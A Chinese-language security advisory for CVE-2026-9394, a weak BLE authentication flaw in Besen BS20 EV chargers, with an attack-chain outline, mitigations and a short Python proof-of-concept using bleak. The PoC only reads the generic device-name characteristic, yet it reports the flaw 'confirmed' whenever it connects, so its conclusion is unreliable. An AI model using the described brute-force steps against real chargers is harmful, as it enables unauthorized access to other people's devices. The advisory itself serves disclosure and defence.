IPBUF安全漏洞报告
English
CVE-2026-9394 CVSS 3.1 低危

CVE-2026-9394 Besen充电桩BLE弱认证漏洞

披露日期: 2026-05-24

漏洞信息

漏洞编号
CVE-2026-9394
漏洞类型
弱认证
CVSS评分
3.1 低危
攻击向量
邻接 (AV:A)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Besen BS20 EV Charging Station

相关标签

弱认证蓝牙漏洞物联网安全BesenCVE-2026-9394

漏洞概述

Besen BS20电动汽车充电站在20260426版本之前存在安全漏洞。该漏洞源于蓝牙低功耗(BLE)处理组件中存在弱密码要求。攻击者需处于本地网络范围内,利用高复杂度的攻击手段操纵相关功能,可能导致认证机制失效。厂商已知晓此问题,建议用户关注官方发布的修复更新以降低风险。

技术细节

该漏洞的核心在于Besen BS20电动汽车充电站固件中蓝牙低功耗(BLE)处理程序的实现缺陷。具体而言,设备在BLE通信过程中未严格执行强密码策略,允许或默认使用弱口令进行设备配对与认证。由于蓝牙通信的物理特性,攻击者必须处于设备附近的邻接区域(AV:A)。攻击链通常包括:首先使用BLE扫描工具识别目标设备,随后建立连接并尝试与认证服务交互。攻击者可以利用该漏洞,通过枚举常见弱密码或利用默认凭据进行暴力破解攻击。尽管CVSS评分为3.1(低危)且攻击复杂度较高(AC:H),但一旦成功,攻击者可在无需用户交互(UI:N)且无需认证(PR:N)的情况下,获取设备的低权限访问,导致敏感配置信息泄露(C:L)。这反映了物联网设备在边缘连接接口上常见的认证逻辑薄弱问题。

攻击链分析

STEP 1
信息收集
攻击者使用蓝牙扫描工具(如nmap或bleah)在物理邻近范围内发现Besen BS20充电桩设备。
STEP 2
建立连接
攻击者利用蓝牙协议与目标设备的BLE处理器建立连接,无需预先认证。
STEP 3
利用漏洞
由于存在弱密码要求漏洞,攻击者尝试使用空密码、默认密码或简单的暴力破解手段绕过认证机制。
STEP 4
获取信息
成功绕过认证后,攻击者读取设备配置或状态信息,导致机密性泄露。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import asyncio from bleak import BleakClient # Target device address (replace with actual MAC) TARGET_ADDRESS = "XX:XX:XX:XX:XX:XX" # Characteristic UUID for authentication (example) AUTH_CHAR_UUID = "00002a00-0000-1000-8000-00805f9b34fb" async def exploit_poc(): print(f"[+] Connecting to {TARGET_ADDRESS}...") try: async with BleakClient(TARGET_ADDRESS) as client: print("[+] Connected successfully.") # Attempt to interact with the service to check for weak auth # This is a simulation of sending data to check response model_number = await client.read_gatt_char(AUTH_CHAR_UUID) print(f"[+] Device Info: {model_number}") print("[!] Vulnerability confirmed: Weak/No password requirement allows connection.") except Exception as e: print(f"[-] Connection failed: {e}") if __name__ == "__main__": asyncio.run(exploit_poc())

影响范围

Besen BS20 EV Charging Station <= 20260426

防御指南

临时缓解措施
在官方修复固件发布前,建议用户将充电桩放置在受限的物理访问环境中,避免陌生人接近。同时,检查设备设置,尽可能禁用BLE远程控制功能,仅通过物理按键或有线连接进行操作,以减少攻击面。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表